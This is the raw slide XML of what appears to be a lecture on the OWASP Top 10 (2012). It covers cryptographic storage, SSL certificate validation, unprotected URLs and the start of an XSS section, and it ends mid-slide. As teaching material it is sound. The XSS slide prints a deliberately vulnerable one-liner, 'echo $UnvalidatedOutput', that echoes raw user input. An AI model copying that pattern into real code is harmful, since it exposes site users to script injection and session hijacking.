                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Using home grown algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Insecure use of strong algorithm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Continued use of proven weak algorithm (MD5, SHA-1, RC3, RC4, etc…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Hard coding keys, and storing keys in unprotected stores</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Use of Encoding instead of encryption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685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>10 (2012) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>and its evolution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="394340" name="Group 100"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="762000" y="1600200"/>
          <a:ext cx="8001000" cy="5029200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3127375"/>
                <a:gridCol w="3346450"/>
                <a:gridCol w="1527175"/>
              </a:tblGrid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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP top 10 2007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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP top 10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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>2012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0" charset="0"/>
                        <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        <a:cs typeface="Arial Unicode MS" pitchFamily="-110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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>MITRE 2006 Raw Ranking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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>1. Cross Site Scripting (XSS)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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>4. Cross Site Scripting (XSS)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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>2. Injection flaws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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>6. Injection flaws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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>3. Malicious file execution (new)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0" charset="0"/>
                        <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        <a:cs typeface="Arial Unicode MS" pitchFamily="-110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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>4. Insecure Direct Object Reference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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>2. Broken Access control  (split in 2007 top 10)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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>5. Cross Site Request Forgery (CSRF) (New)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0" charset="0"/>
                        <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        <a:cs typeface="Arial Unicode MS" pitchFamily="-110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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>6. Information Leakage and Improper Error Handling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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>7. Improper error handling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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>7. Broken Authentication and Session Management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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>3. Broken Authentication and Session Management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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>8. Insecure Cryptographic Storage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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>8. Insecure Storage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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>9. Insecure Communication (New)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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>Discussed in 10. Insecure Configuration Management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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>10. Failure to Restrict URL Access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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>2. Broken Access Control (split in 2007 top 10)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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;removed in 2007&gt;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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>1. Unvalidated input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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;removed in 2007&gt;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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>5. Buffer Overflows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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>4, 8, and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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;removed in 2007&gt;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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>9. Denial of Service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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;removed in 2007&gt;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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        </a:rPr>
                        <a:t>10. Insecure Configuration Management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  <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110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467600" cy="792163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>8. Ensure Cryptographic Storage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458200" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Prevention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Do not create your own cryptographic algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Do not use weak algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Generate keys offline and store private keys with extreme care</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Ensure infrastructure credentials are properly secured</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>. database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>credentials</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Ensure that encrypted data stored on disk is not easy to decrypt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Never store unnecessary data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>e.g. POS terminals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696200" cy="792163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>9. Insecure Communications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8077200" cy="4876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dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Applications frequently fail to encrypt network traffic when it is necessary to protect sensitive communications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Example: application failed to encrypt network traffic, or using SSL improperly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Prevention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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Use SSL for all connections that are authenticated or transmitting sensitive or valuable data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Such as: credentials, credit card details, health and other private information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>When using SSL library be aware of the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Certification validation often checked as default as part of the library. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>BUT, do not make that assumption. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>However, a valid certificate does NOT mean it is the right certificate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>	Libraries don’t check that, application must validate every field, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>especially “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>subjectAltName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Checking CRL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>	Most libraries, today, do not check that as default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>	Checking it typically requires a lot code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1900" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRP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7467600" cy="715963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>10. Failure to Restrict URL Access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8153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900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attackers can use this weakness to access and perform unauthorized operations by accessing those URLs directly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“Hidden” or “specialized” URLs, unfortunately, many of them deal with systems admin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Prevention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Ensure that access control matrix is part of the business, architecture,  and design of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Ensure that all URLs and business functions are protected by an effective  access control mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Perform a penetration test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Pay close attention to include/library files (especially those that are  executable, e.g. .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128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sz="1500" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Do not assume that users will be unaware of special or hidden URLs or  APIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Block to all file types that your application should never use (e.g. only  allow .html, .pdf, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128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sz="1500" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Keep up to date with virus protection and patches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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>1. XSS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24000"/>
            <a:ext cx="7543800" cy="5029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altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Simple example:  echo $UnvalidatedOutput</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Types of XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> UnvalidatedOuput = user_input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>user_input </a:t>
            </a:r>
            <a:r>
